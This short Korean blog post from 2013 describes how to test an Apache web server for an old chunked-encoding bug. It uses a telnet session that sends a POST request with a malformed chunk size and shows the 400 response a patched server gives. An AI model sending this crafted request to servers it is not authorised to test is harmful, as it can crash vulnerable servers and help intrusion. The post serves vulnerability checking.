2013년 11월 26일 화요일

최신 Apache 웹서버 버그 체크하기

먼저 telnet 으로 해당 서버의 80번 포트로 접속합니다.

telnet 0 80
Escape character is '^]'. 상태에서

POST /x.html HTTP/1.1
Host: 192.168.x.x
Transfer-Encoding: chunked

80000000
를 붙여서 보냅니다.

이때 Connection closed by foreign host 와 같은 메시지가 나오면서 바로
끊기는 경우는 버그에 취약한 버젼입니다.

패치가 된 아파치라면 아래와 같이 나올겁니다.
HTTP/1.1 400 Bad Request
Date: Thu, 27 Jun 2002 04:30:42 GMT
Server: Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.1.2 mod_perl/1.26
Connection: close
Content-Type: text/html; charset=iso-8859-1

<출처: 해커스아카테미>

댓글 없음:

댓글 쓰기